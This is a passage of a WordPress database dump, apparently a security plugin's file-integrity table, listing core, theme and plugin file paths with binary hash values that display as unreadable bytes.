���\"','wp-content/themes/mh-magazine-lite/js/jquery.flexslider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y*��~QR��:	]f��h','ρ���ٗ�U��0�@V��u��m�����y','',0,'?'),('*V.XZ��_C[AԀ�C3','wp-includes/js/dist/keycodes.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Va\\|h&[�2/?1�=','�o�$d5TdJ��@uT3�<т�����NmL��','',0,'?'),('*\\Tҝ)%]�yiD+','wp-includes/Requests/Exception/HTTP/402.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�Y�QP�\nz����G�','�g��NQ	�������/���	�y5������θc','',0,'?'),('*lK��qW�M\0|	��Y','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��a�.�t�]U��v�','n��\0��<VEկ�Rm�K�r72k�kSe�\'��#','',0,'?'),('*~��=�ƻ��r�','wp-content/themes/hueman/assets/front/img/demo/10-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"���(�W1\"��B9','��˹��5�i$^P��m-&�+�<�+,��s�','',0,'?'),('*�II(;l9sV��','wp-content/themes/square/inc/css/no-sidebar.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����s���jk%','I6q�(���ߛX�n(�`c��^qi���O�u��','',0,'?'),('*�y���d��A�@HV�[','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/portfolio.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'5d`\08ɸ\r���:�','Jl�rQ��|��!�_�m�%Q)�\\�B�\r�YS','',0,'?'),('*��-3�u��E�[�O#','wp-includes/images/down_arrow-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]����M�����f�','��w\0����qp�q�5���T�#�\\����','',0,'?'),('*�Pbn�$gJQ­k','wp-content/themes/morfeu/assets/sass/bootstrap/_bootstrap-sprockets.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JJ T+�?~�%�I�','�8RA�$����?ju�\'k�g����?�.ɴj�','',0,'?'),('*�v���Ԋ4�j�ڥ','wp-content/themes/alpha-store/lib/cmb_extension/cmb-field-select2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`h�*�\\F�]hG�\r��','�z��q�o\n�X_�pR`�)A|�]N��Y��0','',0,'?'),('*���h�Z�)���C�a','wp-content/themes/barletta/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��`G��7?O�V9ȿ','k�ս�e+�2@l�\Zu��rL��G0���s6A','',0,'?'),('*������b��*ee�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x\\8z�M�~�.��','�vR�\0�S~[�\r��Ү6��o���:Ś�\r]','',0,'?'),('*��L�m&&2��\nb','wp-includes/js/tinymce/utils/form_utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�U��T����Li','vL���us<*r�WҪ����.\0|�Rg����','',0,'?'),('*�`U�z�]\"L%�1��','wp-includes/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/Dzx��ǂ��','���,�����E���{��0/m�a�X�i���','',0,'?'),('*�mB��vH\ne��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_font-sizes.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�����MiGx��V�s','i��Y4t��4|-�>1�]�f�)J����I�Z��l','',0,'?'),('*�&C:[���r�9�N�','wp-includes/sodium_compat/src/Core/Base64/Common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��ef���i�\'�jW','6���UmЖ�%��?�M�S�A^=�X��|U��','',0,'?'),('*�\Z07ѥ1O���َ8','wp-includes/js/json2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s��{N�|EO�0�','q3�..�j G\\R�nݼI/T��-�','',0,'?'),('*�	�ą����\\�','wp-content/plugins/wordfence/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`GN��M��ti����','�r��_4\0��2��:䮰�!p1A��c_','',0,'?'),('*����!��?��,�0�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.dotster.php',0,'��`�]UR0�IO1|y�','��`�]UR0�IO1|y�','O����t�����юs��0P(��c�','',0,'?'),('*�ֽ�J�NgP�����','wp-content/plugins/spam-captcha/lang/spam_captcha-ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0/��40��8lnI�','��WD�q���O�<Uij���͹!��','',0,'?'),('+\"��s����','wp-content/plugins/contact-form-7/admin/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P��%[:����q�G','��ͯ,��ߪ՜+wNd�_0]��ʠ@�N','',0,'?'),('+��5]�j#ǧ�','wp-content/themes/panoramic/upgrade/library/images/icon-support.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0D�;��q�z��;Q39',')�\npU�D��.^�P���\'y �4��[;Ȣ','',0,'?'),('++��u���V�67Sc�','wp-content/plugins/contact-form-7/admin/includes/tag-generator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W*��spG�O��}�p2','k�Ef>��P��7����?/ڨd��m/y','',0,'?'),('+/�\Z�d�� �É`�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/map/class-fw-shortcode-map.php',0,'�D0Aͻyyl�M����','�D0Aͻyyl�M����','����1Hb+o�7���������oٸ�[edj','',0,'?'),('+2s���E�j�','wp-content/themes/nirvana/fonts/sourcesanspro-regular-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Fژ�^��o)','�?�uE;�/�2!�]�p�\0#@��e�z��I�`۫','',0,'?'),('+9���[BU�E�e','wp-admin/js/updates.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�V@D�P2�<iCY','��S�u���N6f�_@�m(����[C�W��.�','',0,'?'),('+M<\nM\r�}-��9','wp-content/plugins/unyson/framework/static/libs/linecons/css/linecons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��1�*ko�',')ɹ����s�nŬ�K�P4Zw�|�E��_��)','',0,'?'),('+V\nN��z\\E\0f�	�','wp-content/themes/wen-business/inc/customizer/blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�o��!x�d��4],W','bd�x�\'d�%�mZ�#P���%uh�[��x�I','',0,'?'),('+b\n��Df�X2���Y�C','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d���S:�-N�!Q�0\"','�6�)?��^\"F�*�g|��&��R�Π��\0	','',0,'?'),('+x��AHJ�8�0gB�L','wp-content/plugins/unyson/framework/includes/option-types/addable-popup/class-fw-option-type-addable-popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q՚91DH���KP�+','��/c9l�M�VG���[{Vc���\\�4IgN�P�','',0,'?'),('+�nK>����^ cڎ�','wp-content/themes/fluida/admin/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B!�ɍ����\n��ϰ~','ZX�rM��f?�p�f��g��9�%�E�4��e�Q','',0,'?'),('+�����:��hj��','wp-content/themes/fluida/resources/images/headers/waterfall.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mRX**H���B� �Y','\'H����	��\n?���g4����r k:*��z�','',0,'?'),('+��G*#���f�','wp-admin/network/site-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=������]��aҸ�','E���\"�%��u�o���)��X���_s�r�z��','',0,'?'),('+�\ZD���Ze}��','wp-content/plugins/wordfence/views/onboarding/plugin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�K����Ʈ�;','2�<������A$2�V���e>G�3�7�\Z�','',0,'?'),('+��P�x�3���L','wp-content/plugins/wordpress-seo/css/xml-sitemap-xsl.php',0,'��\0���.d�Z\07Y','��\0���.d�Z\07Y','J�Zҩ�o�L��1�*f�Ň��\"iVת\'�','',0,'?'),('+��t�%R?������','wp-admin/network/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�+���KVe�=�','WN��h�K2Z�F��W���\r08���J5','',0,'?'),('+�B���9���L�q&','wp-content/themes/nirvana/images/patterns/pattern6.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϩ���r��-Q�?>��f','LJ��;-���az@{��+�f��\Zou','',0,'?'),('+�-�re�=XZr�yg','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-login-menu.php',0,'2\n#��	�.�	M�8�','2\n#��	�.�	M�8�',',�ܹ�������)�x�y#����]���Q5b','',0,'?'),('+�	��[���H[��<FU','wp-content/themes/supernews/assets/library/SlickNav/jquery.slicknav.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y2�ܘ\\K��ȟ�','eԱ\'�\\=/⡉K�)��\".�Y�v�d��X�','',0,'?'),('+�s���|\nm����%�','wp-content/themes/hueman/functions/admin/class-admin-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�{(�i�QNx=��','�W��$r<�G�[Li��0�ԙ��3�d��y�','',0,'?'),('+�������K�<H','wp-content/themes/clean-magazine/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[���Z���ߕ:','s���C.��u���E\Z�?�\\���ۘ�e�=','',0,'?'),(',\0aO��䚢�7%�S','wp-content/themes/skt-construction-lite/images/icon-tw.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M�+��#���{�','�8��X�/.�5Epd�9Ol?�M֗B/O','',0,'?'),(',�\Z�J\'�AWh��','wp-content/plugins/wordfence/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���`�L��gf�','��_�\r\0�����\0�Z}��})v[4�������','',0,'?'),(',��B\"�X�I«6�B8','wp-content/themes/wen-business/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɩ�jً>�Q��	�{�','d���i�07��^*ɘ\"��nr�d�S�Z','',0,'?'),(',��/P��u.o-俤-','wp-content/themes/fabulous-fluid/images/bg-quote.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����A\0p[@�+�\\','�dG.Ī�3\0��T��u-����&�{Ӳ�>','',0,'?'),(',�[�Tme:��B�P','wp-content/themes/accelerate/sidebar-left.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tb?��Ć�_]�\'C��','��U8r(t\Z���mu�m�#,��qU�UB��$','',0,'?'),(',t6ǵ|��p��\Z���','wp-content/plugins/spam-captcha/font-11.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R[�ܷ�!���','�o*c�o�씗g�y]#�K����5/��4�','',0,'?'),(',�8ɺ)\0,[$','wp-content/themes/point/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':���5�	��\\e�xL','�ҋ��+�k���>�b���Ev�V�������f.','',0,'?'),(',�—�X^�^w�X','wp-content/ai1wm-backups/index.html',0,'�A�-pޜ\r͈V�','�A�-pޜ\r͈V�','=���+��O���²���2E[�V�����OD','',0,'?'),(',�2��YsD�z','wp-content/themes/hueman/option-tree/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}���ygϾ\Z�','�nYq�1���~��qz>?9s7��C�u�n','',0,'?'),(',($�C����8���w@','wp-content/themes/hueman/assets/front/fonts/titillium-light-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v��3�\nTd4�,\'','F5ښ�6+;�\n�Sr�����f�(`��W�|\Z','',0,'?'),(',3�h\\���h��ԛ(','wp-content/themes/verbosa/resources/fonts/fontello.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DR���Hnk��q+�','	m�V3���y ~\'���\r��Uu\r�$j�jȍ','',0,'?'),(',<�� �?C]�0A�','wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ͷ���U裦�h�','��ehӧ�&έ��A�3�+WTh��\n\Z)�?��','',0,'?'),(',@�RZ���\n��{A','wp-content/themes/lightly/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F=P>��F����\0���',',��t���\n�\'Yq\0p�ʷ�gS�\"�aQ��L','',0,'?'),(',F\"�ݍ��a��Or2','wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/cron/class-ai1wm-cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c��2��#f�f/Se(','��i[p�Zĺc�\'_�0� ���f��:��ܗ\"','',0,'?'),(',P�ۤTշ�*��B�','wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/general.php',0,' �R}��j�V��^G',' �R}��j�V��^G',':Zg³�~�ӑ{1:kM	R�B�}��+','',0,'?'),(',]\'N�%ݑUeT���)','wp-includes/js/dist/annotations.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��B�%�l��/�>�','.�.�n`���^���j��,���^ �Č�','',0,'?'),(',pD)�4G㇪[��S','wp-content/plugins/contact-form-7/languages/contact-form-7-hy.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�QϼT�u�k%@','d��*j�K%o����E�����5dxh�*��R@','',0,'?'),(',z�e��Y#uJ~[P\r','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' OpR{�ҵ��Gݍ�','�Y��:B���P5M��s_�����.ن�֎�','',0,'?'),(',~�\0�3ַ��w�','wp-content/plugins/contact-form-7/languages/contact-form-7-zh_TW.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v\\6J�g��Otŭ����','�O��8�s��=&�\n�͇�=�V�g�m��\\rB�','',0,'?'),(',��K��%���_��7','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�*9-H�f҅	�X','�ۼ=�w��{���v�^Ƚ���C�qF:@�','',0,'?'),(',���@��hj�qrޒ�','wp-includes/ID3/module.tag.id3v2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�d�4��y�N�4','aƙ�4>$�z���%�5��z	����9��_','',0,'?'),(',�H�w�ܬ�g��1','wp-content/themes/barletta/languages/barletta.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6|�:*% ;Ǣ�{�','��� 9�Om�Z|b[ZK���);�,Z���','',0,'?'),(',�g�y5���LF�:�n','wp-content/themes/illdy/inc/components/nav-walker/class.mt-nav-walker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.i�_��V璠=��',',=��C4�e��ϣ\r��oD����?7��|�','',0,'?'),(',�hɃs?4B[�^՝','wp-includes/SimplePie/Cache/DB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w���M�\rʍ�|D�','g#�����]\"�h0Vq�)�0��j�%���I�','',0,'?'),(',���J���f3��:','wp-content/themes/vega/sample/images/featured-image-5.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�٤P� �飞>D���','���=�w��L��&�P�Q%\n:_�ج\n!����','',0,'?'),(',��#��}�	E�;�`@\r','wp-content/plugins/unyson/framework/includes/option-types/slider/static/libs/ion-range-slider/ion.rangeSlider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�B���!;q=��8','�u�#F�\Z`1�^\"=�2a�p �[|�h\Z5i�','',0,'?'),(',�M�&���K�f~��hK','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-login.php',0,'a�$�$��2�&e۴�{','a�$�$��2�&e۴�{','�0O����O�i&\'?�t����2�)\\h	','',0,'?'),(',��Ӡ�1߆OP�\r�Ƽ','wp-content/themes/wen-business/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�\Z*%����ҵ$��','h�V9?o�.�tԕ�q��(����A��=�','',0,'?'),(',�������lS���r','wp-includes/css/dist/editor/editor-styles-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�߰t�`��VC�','��pHa�P0�4��D�!�2�{�F�͹|��','',0,'?'),(',���j:zXL&��V��','wp-content/themes/precious-lite/css/ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����G�鶽���� �c','\0<NR�\r1z\\V\n�ώ�v!��4��Cz�/�','',0,'?'),(',ٯ��ߟO�\Z:���?','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/options.php',0,'�66�#�xQ>Y�2Qv','�66�#�xQ>Y�2Qv','{X~�4cv3d��0��zp��mNM%h�P�/e','',0,'?'),(',����AkE`,��s','wp-content/themes/nirvana/images/socials/Instagram.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&f��׊�\'8<�\'[�','9{~A��a=+��\\�(��	#-�>��/�','',0,'?'),('-��aT�ޱXJϓ��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M@-~��V���rq<','B�U��\n^E��������FE�י�慎q�d','',0,'?'),('->���\"x	�I��','wp-content/themes/twentytwentyone/assets/js/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~K�a��OV��E��','��wr^V[�׭�����H\"��|�iAu�h,�','',0,'?'),('-�Ȑ�m�De��<a�','wp-content/themes/fabulous-fluid/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F����u�*0�=-��','�ӹ�)3��8��G��dħkT����o���[��z','',0,'?'),('-m[�D���I��','wp-content/plugins/wordpress-seo/admin/google_search_console/class-gsc-mapper.php',0,'�P�$wQ�/7��?�j','�P�$wQ�/7��?�j','*�\0��gQ�-,GYxɁ�[ׇR��mi��vX','',0,'?'),('-�T��a�P�?�0et','wp-content/plugins/wordpress-seo/admin/class-admin-init.php',0,'�uPl�	굅X���2','�uPl�	굅X���2','E�����X�W��Ļ���)�D�͜�>�〞','',0,'?'),('-!�R��zu�V��','wp-content/themes/the-minimal/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�4 0=Rㅍwf��','n��j.w*�k�U��e1�AI)(�1z������','',0,'?'),('-)�JfG��H8���','wp-content/plugins/unyson/framework/static/libs/moment/moment-with-locales.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��زP��-W��E8�','���S����~_t��=��וy`v���J~�(','',0,'?'),('--�ü��$�);��J5','wp-includes/js/dist/rich-text.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\nDf4ة)��32ʻ>','�:G�!��h|t�-3]:��ׁ�j���_�}','',0,'?'),('-B��CI��}�~����','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/service/Google_Service.php',0,'�\r9gr���0�!3C','�\r9gr���0�!3C','�[Fae�L�]=����ipM߾2ÿ�^$U�8','',0,'?'),('-MM��z\'\r�&/jj','wp-content/themes/the-minimal/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%���4��ʂV^�','��Z^:�U�|Y2g�B���W	d��R8ż�','',0,'?'),('-\\��[�����J�ץ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�1���	�M����]�','��A8��{�!��V�t<S��qH�oh�4��y`By�','',0,'?'),('-jާ� �����~hyb','wp-content/plugins/wordfence/lib/menu_support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�-ce$���','��\"\n�|�\'iJ���O��u;�DU���8','',0,'?'),('-kdϯ���X�w\\7���','wp-includes/admin-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<c��J�&�� �','�!p�]�z\\ږV�PF����F9���%,�[.','',0,'?'),('-����Ǹ�%w=��','wp-admin/css/colors/ocean/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������V�*,^b*$�','nh�ᷘvU�?D��4��w�Zq������w_','',0,'?'),('-�%�}����{>�K��','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.it.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t@��g\n�!]oh�n�','CU���O@��p��Y�J(���M%��T�f','',0,'?'),('-���_���mq+��1�','wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h㠲���i�e��ɡ','IH�Mp\\��N�h\n׈N��F=-���Z�=hO','',0,'?'),('-�]ج��ј[�e�|','wp-content/themes/hueman/functions/init-plugins-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l4�	g���p������','j��hm��E��P #ysT�s��K<���Jj�','',0,'?'),('-��)7�5y�8c��Wv�','wp-admin/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\05N�؅ú�{��5','�l��/�s��n{�=��]}�/��d,��','',0,'?'),('-�_��+��Yn��S','wp-includes/js/jquery/ui/tooltip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�\r��c5V����h','+*5�~oѼ�>�\\Z������c���l�','',0,'?'),('-�f��4]�#\"u��l','wp-admin/css/colors/light/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�vB�\0��\Zv�w4]','�;��Iʃ��Xn��L�\" l�٢d�v!{/','',0,'?'),('-���{�\nwQ���^g','wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�}Z/���X[�{6��','p���W��	��/������\r��񒃄%\Z��`','',0,'?'),('-��藂��Y{]ns�','wp-includes/css/wp-pointer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�}�4n0Z�u�','>���%�\"N��<��\"�/�c���f�~�','',0,'?'),('-�#0]h��f����\"�','wp-content/themes/clean-magazine/js/html5.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�V˜L^��(U�N�','[�|�*|5k��9^�/ �9� ʫ�z/��yI�','',0,'?'),('-��t5��gM/pl�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.joker.php',0,'�}gu1��)�ᣁ�','�}gu1��)�ᣁ�','4�JQ.��U���񾂓Xh���x�R�`�tDZ','',0,'?'),('-�r\Zp�b��\"W%��$�','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-internallinks.php',0,'�R8!�t��QF���','�R8!�t��QF���','18���P@�A7]v1��ר�Cn�� ��o;','',0,'?'),('-�d�L�ƥXH�m�','wp-content/themes/twentytwentyone/assets/js/editor-dark-mode-support.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ap!}��7�Wsj�','j�����=Xi_����ְނpߤ��^Ѯ��','',0,'?'),('-����\0�V���/F=�','wp-content/plugins/unyson/framework/extensions/backups/extensions/backups-demo/includes/entity/class-fw-ext-backups-demo.php',0,'o_g�Kd8J}$�\r','o_g�Kd8J}$�\r','(Op��B�p���:��LjRZ�\'x���^�M|','',0,'?'),('-�²��)�5����','wp-content/themes/hueman/assets/front/img/sidebar/s-right-dual-s2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[(>~=0���8\nO�\'','��`���+�HNR[S����ѣ�M����f','',0,'?'),('-�ܕO�r�`�x;��q','wp-content/plugins/wordfence/modules/login-security/js/login.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~V���tj�:��','.�y�@�Ive\Z�?g�d����h�O�����\0','',0,'?'),('-���p\\�0�1_\0�\n�<','wp-content/themes/fluida/includes/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�ł�=T@\Zb��v�H','T<�݄�I����iBs�%\'���2g/&','',0,'?'),('-�~ߗF;KZ�G���','wp-content/plugins/unyson/framework/static/libs/unycon/demo-files/demo.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r#����v�Z>��7','|}P\n�.����0��fOA�[�iJ(�?]�wR���','',0,'?'),('-�Y&���Z��աe���','wp-content/plugins/spam-captcha/lang/spam_captcha-pl_PL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w\r��̥)�6�\0��','�o(X�%�\\\r���!�%xe0`*q^\"PkAA��','',0,'?'),('-�ha+`NST����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/spacer/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>:�wv��:4p��Y ','Ϲ�%虬Yu{].���ג�d�.��@��','',0,'?'),('-�#G� �ЊX�^yȡ','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/column/includes/template-component/class-fw-ext-builder-templates-component-column.php',0,'��g.�E7L��p[','��g.�E7L��p[','��nM�~Z1ȀQ�~׵N��\rB��s{��4','',0,'?'),('-����z$a�����\n�','wp-content/plugins/all-in-one-wp-migration/lib/model/import/class-ai1wm-import-compatibility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7^XP�G�㤚Z�Q','���K��Iz�9��p˕-�,Z*�o�C�BJ��','',0,'?'),('.Ќ��jq�v)P:�','wp-content/themes/hueman/functions/widgets/alx-tabs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�/js�sXP�zb','F�;�\'��� ^%cl+������OW��C3Y8�','',0,'?'),('.Lۡgށ��^�L','wp-content/plugins/wordpress-seo/admin/pages/metas.php',0,'�zpWx<%�w5��t��','�zpWx<%�w5��t��','iH�2���t,k������Qa���r�+۫','',0,'?'),('. �\0_oE�]A�_�0PJ','wp-includes/js/tinymce/plugins/wpautoresize/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�.�Aj_�m�r#i�','\'��C��b\"B��\\�N�N���*r&.X��J','',0,'?'),('.8��a�2�A��P��8�','wp-content/plugins/all-in-one-wp-migration/lib/model/class-ai1wm-backups.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F0^���O���PT�','��\Z2�Q��X�w�Dp�\n�����ͩ�0�h�','',0,'?'),('.IK�E�\\�,�RW蟨�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/views/view.php',0,'d�1i�t3t[��Q)','d�1i�t3t[��Q)','����:�@���k��h� ºB�\'�hAk��~','',0,'?'),('.IhU���3��+B\Z��','wp-includes/images/admin-bar-sprite-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q����8��o��','*E��Ts���al�^�p��X���Z\0��','',0,'?'),('.I��ҵ�z�K	�KB$','wp-content/themes/morfeu/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eSU��ٚ�bBti','*<��(��(��P	\"\"g�7�Q��ܭ<w��','',0,'?'),('.s+T�\0I$�j��\Z','wp-content/themes/illdy/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�\r�+B���{VV��','w�Z�d��#s�un\n�ec6�\05Þ��','',0,'?'),('.x��Ϯ�7����_�','wp-includes/js/mediaelement/mediaelement-and-player.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"���\n�-ۤ�Y','$9~�=:����Z�F�m}�A�5ks�	V#� �*','',0,'?'),('.�麉D0�u�L-c�','wp-content/plugins/wordfence/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t���n`K��T�Qr�','~eY�Ze�s��27��������B/=T�3oH�','',0,'?'),('.���[��C q�]\'�z','wp-content/plugins/unyson/framework/includes/option-types/slider/static/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Bd��ݛ\r��3�C','\nh��G�t�p����Ǯ���sil','',0,'?'),('.�E�[J��l�x��','wp-content/plugins/wordfence/images/forward_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M_��Z?�N)�Ҋ�:�5','���/�<>O&�ȕJR݇e�}�(��m','',0,'?'),('.��7�f�w9Pm@����','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�H�#�IHD���','�v�o�VYx�?���\n��\n&3c-\r�8�m��','',0,'?'),('.�B��:#G��ݣc��','wp-content/themes/panoramic/upgrade/library/images/bullet-tick-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0